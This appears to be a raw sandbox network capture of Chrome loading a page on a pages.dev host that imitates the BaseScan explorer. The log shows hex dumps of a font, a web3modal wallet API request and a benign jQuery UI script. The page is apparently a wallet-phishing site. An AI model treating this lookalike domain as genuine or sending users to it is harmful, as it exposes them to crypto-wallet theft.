                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC432INData Raw: 77 4f 46 46 00 01 00 00 00 01 5e e0 00 0d 00 00 00 02 06 78 01 4b 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 30 00 00 00 1c 00 00 00 1c 8e a8 39 f2 47 44 45 46 00 00 01 4c 00 00 00 1e 00 00 00 1e 00 2a 01 c3 4f 53 2f 32 00 00 01 6c 00 00 00 4c 00 00 00 60 42 0f 56 a8 63 6d 61 70 00 00 01 b8 00 00 03 45 00 00 05 ea ed c3 eb 0e 67 61 73 70 00 00 05 00 00 00 00 08 00 00 00 08 ff ff 00 03 67 6c 79 66 00 00 05 08 00 01 44 57 00 01 d9 dc 6b 57 cb 40 68 65 61 64 00 01 49 60 00 00 00 34 00 00 00 36 18 19 56 97 68 68 65 61 00 01 49 94 00 00 00 21 00 00 00 24 04 36 03 ef 68 6d 74 78 00 01 49 b8 00 00 02 7a 00 00 06 f4 52 a3 06 96 6c 6f 63 61 00 01 4c 34 00 00 03 7c 00 00 03 7c a8 1f 18 0a 6d 61 78 70 00 01 4f b0 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wOFF^xKFFTM09GDEFL*OS/2lL`BVcmapEgaspglyfDWkW@headI`46VhheaI!$6hmtxIzRlocaL4||maxpO
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 60 60 04 00 7d 49 0e 44 78 9c ed d3 7d 68 95 75 14 07 f0 e7 6e 57 f7 bc dc 73 ee 74 a1 19 16 45 0a 65 38 dc 2a 35 75 1a a3 88 a8 a0 46 a2 45 45 7f 24 6e ac 96 91 e1 4b a5 db 72 d1 2a 29 a7 69 d7 97 59 99 33 df cb 66 16 6d 16 a8 6b ad 5b dd 26 33 b0 e5 ba b8 34 c1 97 e7 9c f3 3c cf ef 79 34 5c 3f ae 23 22 08 fc ab fe e9 0b e7 c0 17 7e 7f 1c 3e f0 33 0c 23 df b8 34 a3 8d 98 de 46 bc 5f b7 58 ae c7 e3 9d 86 11 2b d6 a5 c0 28 76 eb dd d7 dd 26 77 9d db e3 66 a9 88 26 d2 34 7a 98 aa a8 86 9e a1 f9 b4 84 ea 68 19 2d a7 55 f4 36 ad a3 66 da 46 fb 68 3f a5 e9 47 3a 45 67 c9 e7 7c b6 18 79 04 97 f2 24 9e ce f7 f2 63 5c cd 35 3c 8f 97 70 3d bf ca ab 38 c5 2d bc 8b 5b f9 53 ee e0 a3 7c 8c 7f 91 47 e4 39 79 51 6a a5 41 5e 91 37 64 8d ac 95 8d f2 be ec 91 76 f9 52 0e
                                                                                                                                                                                                                                              Data Ascii: ``}IDx}hunWstEe8*5uFEE$nKr*)iY3fmk[&34<y4\?#"~>3#4F_X+(v&wf&4zh-U6fFh?G:Eg|y$c\5<p=8-[S|G9yQjA^7dvR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: a3 61 d0 1c 34 e1 37 68 c0 0f 85 b4 66 95 27 9e 2f 0b 7f dd d9 71 dd ae 5d a7 96 3b 3a c2 d4 31 4d c2 34 26 db 8a 53 c6 72 ca cb 68 b6 a2 d2 50 91 bd 09 4f d4 32 54 95 1d 3d eb a5 b4 c3 0c 11 51 17 e1 63 60 22 62 a2 20 a8 21 4c 18 e6 1f 91 12 8c 09 16 11 c6 08 11 7c a1 14 6d 9d 71 ae 8c 37 4e 9d da 88 af 74 b0 8a ca 32 5c a2 2a ae c4 08 b2 0b 96 c5 b0 64 16 83 c0 f1 32 58 91 e0 83 99 8a d3 7e ca 0f 8a a6 84 15 df 1c 43 ea 2a 92 90 44 08 a6 12 82 3d 8c 28 7f 98 86 20 05 49 4a f2 64 06 a9 08 e1 91 2c fe 18 0b e8 7d c2 0c 1c 24 35 36 ec 11 71 b5 91 fc b4 f1 0e 14 84 0d a8 5c de 71 12 a1 08 47 9d 0a fd 11 6a ed bd f7 92 ab f6 6a e6 de 85 a8 af aa 8a 69 a6 1b 41 90 99 b6 9a af 5b c5 3b 26 da a5 5a 49 af 16 8b 01 6a 89 4a ff d6 2b 07 d3 68 6a ac 84 88 54 9c c8
                                                                                                                                                                                                                                              Data Ascii: a47hf'/q];:1M4&SrhPO2T=Qc`"b !L|mq7Nt2\*d2X~C*D=( IJd,}$56q\qGjjiA[;&ZIjJ+hjT
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: b7 78 78 e9 ba a5 29 74 ef 72 ad 6e 48 ff 6c bb 5b 7f 8f 02 fe bd 76 6a 6a 87 30 c4 87 67 40 66 45 c1 17 04 a7 42 58 13 c5 51 d8 b5 40 61 47 25 d4 5d 41 51 13 9d 89 3e f2 11 e4 48 ff a8 3f 4b fb 03 71 9a de 80 ae 33 9f 17 d1 33 5b f7 f6 7a a0 da de bf 6c 9a 8d 7d b9 dc 2f cd 8e fa fa 2b 49 1f 10 10 64 16 77 59 b8 82 2a 31 ff 43 af ac fe f0 65 6f 53 be f7 1d ee d6 e7 6d b4 5f db fa 9c 03 99 bc ef e0 c1 6b c6 26 27 af db ec 6f 82 b4 90 b3 2f a1 87 41 6e da c2 4e de 7a f5 00 ec 07 03 79 ac 46 c9 26 ee 74 03 d0 7c fd 36 62 d5 a8 1f c4 fd ae 3f 00 41 f5 8b 22 40 15 bf 13 0c 3a dc 14 b5 45 ca 3a c1 32 4d f6 22 34 d8 cf e8 ee b5 d9 8c 31 ab 5c a5 12 e6 18 3a 22 61 41 22 47 0c 9e e6 96 0b 9e 81 e8 b7 90 ab fa a6 ab 6b 54 49 39 39 0b 94 60 a8 67 ec c0 34 98 e6 bb
                                                                                                                                                                                                                                              Data Ascii: xx)trnHl[vjj0g@fEBXQ@aG%]AQ>H?Kq33[zl}/+IdwY*1CeoSm_k&'o/AnNzyF&t|6b?A"@:E:2M"41\:"aA"GkTI99`g4
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 5f ab 7e 6f 28 73 c2 2a 5e 45 ef 48 74 c0 94 20 d4 12 71 0b 3c 71 f4 bb 82 00 6f 46 55 0b 0d dd 16 1c d3 f8 1e a0 68 c4 2a 6d 84 7e db 35 4d d7 da fa 91 6b 59 ae f9 df 67 b0 4a c9 ac 3d 39 95 ca ed 49 cf 12 aa e2 99 95 03 14 af d2 03 ef 37 3d 73 fb ff ed 87 31 51 a5 a3 b2 ce 6c ed a8 a4 12 7c b8 7a ff de bd a0 91 54 41 39 fb 15 f4 45 f4 32 bc 43 06 74 d1 5b 84 f7 09 9f 14 be 8e 54 34 86 d6 41 96 a3 66 8f cb 94 07 98 93 55 fb 7c bf 43 59 75 76 86 ba 81 cf f5 0d 6f 70 50 42 14 ce 02 c3 e6 07 6d 0c c7 8d 21 23 48 f4 15 d4 7d 23 d9 01 86 b3 8c 39 5a 04 8a 09 a4 3b e0 ae 8c 30 f9 23 14 b6 8d 41 b7 08 ed 08 69 70 6f 95 55 69 38 98 01 cb 16 73 c6 0a b7 27 4e 0d d0 6a dd 20 51 82 dc d8 72 c8 57 25 83 c6 50 16 13 0d c8 99 13 d0 cf 90 ab c0 41 9f 5f da 4f 2e 87 c4
                                                                                                                                                                                                                                              Data Ascii: _~o(s*^EHt q<qoFUh*m~5MkYgJ=9I7=s1Ql|zTA9E2Ct[T4AfU|CYuvopPBm!#H}#9Z;0#AipoUi8s'Nj QrW%PA_O.
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: fc 2f 1c 8e f7 38 c3 0a 13 f7 de 0e c4 05 33 69 43 a8 82 0e d8 02 30 e1 70 80 2b 64 ac 8a 28 35 52 81 6b 11 96 5b 64 a0 77 3d b5 e5 ea 22 b2 73 d3 d7 d6 aa 53 a6 b7 a8 69 a2 bf c3 a6 12 70 53 26 32 f1 94 ed a6 dc 9a a2 b0 d4 62 1a 5d 6a 6d 74 91 02 cc 34 95 0e d3 72 46 54 f5 40 6d 98 15 5b d5 b5 b9 5e fb c4 8c ea a8 c6 8e 6b 15 e3 4a d3 53 54 51 a4 62 70 af 93 f2 97 3c 17 a0 2c e3 ef 84 15 f4 49 c1 10 1a c2 8c b0 2c 5c 0a cc fc 24 24 72 63 0a 96 75 c0 39 7a 83 54 47 96 9a 9b 3c 9e 46 13 e3 c7 e8 20 a9 52 50 16 03 77 00 36 93 36 e2 e1 7d 24 a9 6d 6e f0 8a 88 57 3e 18 f3 65 d4 88 1b 43 c3 88 7e 85 66 52 9a 2e a9 8d ae 4e 5c e3 2b 47 1f da b7 67 69 92 80 59 b2 96 f6 ba 60 99 d6 44 b2 ba d1 53 ae 59 5d 3d 2c c3 66 57 e7 68 c3 a6 75 ea 5c 1a eb 26 5d d7 77 96
                                                                                                                                                                                                                                              Data Ascii: /83iC0p+d(5Rk[dw="sSipS&2b]jmt4rFT@m[^kJSTQbp<,I,\$$rcu9zTG<F RPw66}$mnW>eC~fR.N\+GgiY`DSY]=,fWhu\&]w
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 9a 50 cd 41 d2 aa 86 a9 d6 3a ce 1c 24 98 9a c5 76 48 d8 ed d4 14 cb 76 a9 85 0f 0c 72 b3 35 0f 81 22 3c 2a 8a 92 e4 ec 73 00 df 8b c6 ba af f1 fb a9 fe 1e 4b 55 2d cb 7b 2c 69 d9 6f ab 19 7c 40 d7 4c cb b3 4c 13 d1 2b 70 46 4d 97 64 26 b7 62 2b 53 73 c1 6e 97 d2 f7 42 2e a2 e3 70 ea 63 a0 63 c9 cd 2a d3 b8 0d 96 ce f5 7d 03 38 76 1d 50 d5 b5 89 7f 7c 54 fc 00 34 50 d3 1b a2 5e 8e 76 87 2f 33 3c 8c cf 57 64 95 4e c0 46 15 94 a0 8e ff 45 15 0d 86 35 84 72 c0 d9 36 53 f0 52 92 b9 c7 94 ae b4 35 cd b2 34 cd 3e 31 fc b1 9f 3f 5f 83 dd 68 6a cd 81 bb 08 60 8b 03 30 5b 5e 93 b0 37 68 68 56 ca 67 36 3e b2 b0 78 18 db cc bf 59 94 52 29 c8 4e 32 4d 69 76 94 8b bd 9d ed 97 5f cd 2c ff 31 35 87 8e 9a 00 b1 ad c0 b6 a0 78 a7 70 4e cb 56 64 59 19 5f 5a 1a 57 99 5c c9
                                                                                                                                                                                                                                              Data Ascii: PA:$vHvr5"<*sKU-{,io|@LL+pFMd&b+SsnB.pcc*}8vP|T4P^v/3<WdNFE5r6SR54>1?_hj`0[^7hhVg6>xYR)N2Miv_,15xpNVdY_ZW\
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 78 c2 29 69 9b fb b4 80 97 72 ec 98 20 c5 80 35 f9 f0 10 1f 91 4c e2 9e f8 7b 37 81 06 c4 1c 61 4c a3 98 33 5d ee 37 6e f2 f0 b0 c4 e0 36 e2 10 68 3f b7 c9 31 8a d2 61 45 1c 8c 4f 3a 79 5f bd 71 b2 5b b1 3d 43 f6 b2 6f bb c2 74 07 19 52 0d d3 51 31 b0 a7 26 ad a0 a8 a9 c7 ff 3c 28 46 19 33 e3 90 cc bc 37 69 e7 03 ed c6 a9 13 72 eb fa 99 a6 de 8a 89 0d 67 a2 ac 67 4e 4e 9a aa 56 52 8f 69 e8 c6 4c 54 f0 f5 f1 49 13 6e be 71 b2 53 b5 dd 41 56 ac 5c 73 d4 84 47 f0 9c e0 c1 73 53 53 3c 1f f5 f8 6b 48 25 cc 44 46 60 c8 66 30 ba e1 84 d2 42 3c 6b 80 2a 7a 94 f1 2b 62 3c 09 17 6b 9a 76 95 ce 31 b7 20 68 78 15 dd 27 68 a0 5f 32 a0 99 bb dc c2 c6 41 c2 b9 9c 6e c7 f7 40 0b 77 fa bd 28 ec f0 51 1b bf 0e 8a 39 f4 58 34 b4 a7 71 f7 55 2c c2 ba 5c 5a 7e b4 73 4f ff b7
                                                                                                                                                                                                                                              Data Ascii: x)ir 5L{7aL3]7n6h?1aEO:y_q[=CotRQ1&<(F37irggNNVRiLTInqSAV\sGsSS<kH%DF`f0B<k*z+b<kv1 hx'h_2An@w(Q9X4qU,\Z~sO
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 40 a9 80 2d 4e 27 0d be 82 06 25 e4 87 71 93 85 80 70 e3 b0 df 64 2b 88 1f 34 59 dc 67 e8 5f 54 f5 ef 75 fd ef 93 ad 7a cd fe ef ff d6 fe 6b be 1a 3f 7a cd fe ff 78 e0 c0 81 1b 93 03 54 a6 fa d3 3a 7d 5a 96 9f de de 59 3c bd d2 bd e7 9e ee 4a ff d2 fa cb b0 9b 05 aa f1 f2 f0 90 8f 7b 00 e1 da 89 1e 82 d2 ec 15 de 0a f5 53 44 0c 90 2e 97 4d 3e 3e 9c 84 b8 82 6e 98 49 00 c6 88 6f 71 4c d5 e7 21 6b bc ce c6 87 01 11 09 a0 08 83 6e d0 ef 74 39 00 1b dd 9f 38 d2 93 b1 f0 c4 e9 ce 43 a8 07 89 eb 22 e4 63 d4 6d 9c a0 90 a1 33 03 9d ad 96 14 d1 cb d7 bc e8 4f 2e 75 6a 8b aa 16 16 28 a2 cd c6 b4 9c 69 55 f7 6f c4 86 28 a1 5c c1 9f 50 91 5f 9d ee 0c c2 96 0f 10 15 cb a8 51 8d 64 62 14 5c 33 b7 f1 1b bf 6a 4f 2c 8a cd 74 c6 95 f7 5a c5 a2 49 ad 74 c5 c2 32 a1 ba 64
                                                                                                                                                                                                                                              Data Ascii: @-N'%qpd+4Yg_Tuzk?zxT:}ZY<J{SD.M>>nIoqL!knt98C"cm3O.uj(iUo(\P_Qdb\3jO,tZIt2d
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 74 9e 4a 81 33 53 fd d0 e9 64 7c c3 3f fb 55 74 1a 70 a8 cd 23 d8 40 d1 72 1b d9 18 46 6b d0 26 75 87 bf 8d 41 18 0c 27 bf 98 20 00 dc e1 bd 8c f7 80 00 2b 71 ac 97 4b 41 65 31 7f fb 3b 77 5d ff e6 43 16 33 97 6f 3b 38 5f 5f ae b2 94 a8 da a0 95 9b fb 67 2c 6c 5e f3 b1 f9 5c b7 12 56 4a ee 3d 68 e3 fa 5d 07 6e 72 c4 3c b1 37 d7 e7 0f d6 e6 77 47 b2 a9 b4 ae d8 3d 35 c4 c5 ec ec d7 d0 97 a1 3c 1d 41 a8 51 6e 2c a0 93 14 09 77 b2 f3 c7 26 00 c7 a4 20 1a dc 59 92 94 33 e9 4b e8 8b 54 d7 35 91 64 33 b2 95 92 89 75 67 14 dd 61 d3 b2 97 c9 22 cc 64 50 d8 bc 27 a8 ac 42 0e 6d 1e da 24 15 d8 cd 23 cd b2 a9 94 89 7d 42 15 5d 92 01 32 aa 29 40 28 19 24 6a aa ae 50 e4 ce 94 33 87 ae 7e e3 fd d7 1c ca 94 67 86 b2 6c 9c fd 21 20 f3 67 92 b1 cf 16 e8 f2 dd 3c de 05 25
                                                                                                                                                                                                                                              Data Ascii: tJ3Sd|?Utp#@rFk&uA' +qKAe1;w]C3o;8__g,l^\VJ=h]nr<7wG=5<AQn,w& Y3KT5d3uga"dP'Bm$#}B]2)@($jP3~gl! g<%


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              108192.168.2.549852104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC681OUTOPTIONS /getWalletImage/68e8063a-ff69-4941-3b40-af09e2fcd700 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC449INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dfafa64370-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              109192.168.2.549854104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC607OUTGET /assets/js/components/hs.unfold.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 9562
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=15122
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58863
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4t9LPt5qBlN%2Bs5DZ2ExiQLt2SMmA%2B7npTA4PQ0M1TQmnsAHK5PqEqzwVpBKrlm5ShN3%2BLGQMdqRvf8HBhGgXqC1iIkAYvRNpwScu9KJZ%2Buo%2Fb%2F6tj4SPTMWRKi9RQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e0dd9742d3-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC489INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 55 6e 66 6f 6c 64 3d 7b 5f 62 61 73 65 43 6f 6e 66 69 67 3a 7b 75 6e 66 6f 6c 64 45 76 65 6e 74 3a 27 63 6c 69 63 6b 27 2c 75 6e 66 6f 6c 64 54 79 70 65 3a 27 73 69 6d 70 6c 65 27 2c 75 6e 66 6f 6c 64 44 75 72 61 74 69 6f 6e 3a 33 30 30 2c 75 6e 66 6f 6c 64 45 61 73 69 6e 67 3a 27 6c 69 6e 65 61 72 27 2c 75 6e 66 6f 6c 64 41 6e 69 6d 61 74 69 6f 6e 49 6e 3a 27 66 61 64 65 49 6e 27 2c 75 6e 66 6f 6c 64 41 6e 69 6d 61 74 69 6f 6e 4f 75 74 3a 27 66 61 64 65 4f 75 74 27 2c 75 6e 66 6f 6c 64 48 69 64 65 4f 6e 53 63 72 6f 6c 6c 3a 74 72 75 65 2c 75 6e 66 6f 6c 64 48 69 64 65 4f 6e 42 6c 75 72 3a 66 61 6c 73 65 2c 75
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSUnfold={_baseConfig:{unfoldEvent:'click',unfoldType:'simple',unfoldDuration:300,unfoldEasing:'linear',unfoldAnimationIn:'fadeIn',unfoldAnimationOut:'fadeOut',unfoldHideOnScroll:true,unfoldHideOnBlur:false,u
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 65 74 75 72 6e 3b 73 65 6c 66 3d 74 68 69 73 3b 76 61 72 20 66 69 65 6c 64 73 51 74 79 3b 63 6f 6c 6c 65 63 74 69 6f 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 69 2c 65 6c 29 7b 76 61 72 20 24 74 68 69 73 3d 24 28 65 6c 29 2c 69 74 65 6d 43 6f 6e 66 69 67 3b 69 66 28 24 74 68 69 73 2e 64 61 74 61 28 27 48 53 55 6e 66 6f 6c 64 27 29 29 72 65 74 75 72 6e 3b 69 74 65 6d 43 6f 6e 66 69 67 3d 63 6f 6e 66 69 67 26 26 24 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 63 6f 6e 66 69 67 29 3f 24 2e 65 78 74 65 6e 64 28 74 72 75 65 2c 7b 7d 2c 73 65 6c 66 2e 5f 62 61 73 65 43 6f 6e 66 69 67 2c 63 6f 6e 66 69 67 2c 24 74 68 69 73 2e 64 61 74 61 28 29 29 3a 24 2e 65 78 74 65 6e 64 28 74 72 75 65 2c 7b 7d 2c 73 65 6c 66 2e 5f 62 61 73 65 43 6f 6e 66 69 67 2c 24 74
                                                                                                                                                                                                                                              Data Ascii: eturn;self=this;var fieldsQty;collection.each(function(i,el){var $this=$(el),itemConfig;if($this.data('HSUnfold'))return;itemConfig=config&&$.isPlainObject(config)?$.extend(true,{},self._baseConfig,config,$this.data()):$.extend(true,{},self._baseConfig,$t
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 74 29 3b 7d 29 3b 7d 29 3b 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 73 63 72 6f 6c 6c 2e 48 53 55 6e 66 6f 6c 64 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 6c 66 2e 5f 70 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 69 2c 65 6c 29 7b 76 61 72 20 55 6e 46 6f 6c 64 3d 24 28 65 6c 29 2e 64 61 74 61 28 27 48 53 55 6e 66 6f 6c 64 27 29 3b 69 66 28 55 6e 46 6f 6c 64 2e 67 65 74 4f 70 74 69 6f 6e 28 27 75 6e 66 6f 6c 64 48 69 64 65 4f 6e 53 63 72 6f 6c 6c 27 29 26 26 66 69 65 6c 64 73 51 74 79 3d 3d 3d 30 29 7b 55 6e 46 6f 6c 64 2e 68 69 64 65 28 29 3b 7d 65 6c 73 65 20 69 66 28 55 6e 46 6f 6c 64 2e 67 65 74 4f 70 74 69 6f 6e 28 27 75 6e 66 6f 6c 64 48 69 64 65 4f 6e 53 63 72 6f 6c 6c 27 29 26 26 21 28 2f 69 50 68 6f 6e
                                                                                                                                                                                                                                              Data Ascii: t);});});$(window).on('scroll.HSUnfold',function(){self._pageCollection.each(function(i,el){var UnFold=$(el).data('HSUnfold');if(UnFold.getOption('unfoldHideOnScroll')&&fieldsQty===0){UnFold.hide();}else if(UnFold.getOption('unfoldHideOnScroll')&&!(/iPhon
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 27 29 3b 7d 2c 64 65 6c 61 79 29 3b 7d 29 3b 69 66 28 24 75 6e 66 6f 6c 64 2e 6c 65 6e 67 74 68 29 7b 24 75 6e 66 6f 6c 64 2e 6f 6e 28 27 6d 6f 75 73 65 65 6e 74 65 72 2e 48 53 55 6e 66 6f 6c 64 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 48 53 55 6e 66 6f 6c 64 3d 24 69 6e 76 6f 6b 65 72 2e 64 61 74 61 28 27 48 53 55 6e 66 6f 6c 64 27 29 3b 69 66 28 48 53 55 6e 66 6f 6c 64 2e 75 6e 66 6f 6c 64 54 69 6d 65 4f 75 74 29 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 48 53 55 6e 66 6f 6c 64 2e 75 6e 66 6f 6c 64 54 69 6d 65 4f 75 74 29 3b 48 53 55 6e 66 6f 6c 64 2e 73 68 6f 77 28 29 3b 7d 29 2e 6f 6e 28 27 6d 6f 75 73 65 6c 65 61 76 65 2e 48 53 55 6e 66 6f 6c 64 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 48 53 55 6e 66 6f 6c 64 3d 24 69 6e 76 6f 6b 65
                                                                                                                                                                                                                                              Data Ascii: ');},delay);});if($unfold.length){$unfold.on('mouseenter.HSUnfold',function(){var HSUnfold=$invoker.data('HSUnfold');if(HSUnfold.unfoldTimeOut)clearTimeout(HSUnfold.unfoldTimeOut);HSUnfold.show();}).on('mouseleave.HSUnfold',function(){var HSUnfold=$invoke
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 65 6c 65 6d 65 6e 74 3b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 63 6f 6e 66 69 67 3b 74 68 69 73 2e 74 61 72 67 65 74 3d 24 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 27 75 6e 66 6f 6c 64 2d 74 61 72 67 65 74 27 29 29 3b 74 68 69 73 2e 61 6c 6c 49 6e 76 6f 6b 65 72 73 3d 24 28 27 5b 64 61 74 61 2d 75 6e 66 6f 6c 64 2d 74 61 72 67 65 74 3d 22 27 2b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 27 75 6e 66 6f 6c 64 2d 74 61 72 67 65 74 27 29 2b 27 22 5d 27 29 3b 74 68 69 73 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 74 61 72 67 65 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 66 28 74 68 69 73 2e 64 65 66 61 75 6c 74 53 74 61 74 65 29 7b
                                                                                                                                                                                                                                              Data Ascii: ;this.element=element;this.config=config;this.target=$(this.element.data('unfold-target'));this.allInvokers=$('[data-unfold-target="'+this.element.data('unfold-target')+'"]');this.toggle=function(){if(!this.target.length)return this;if(this.defaultState){
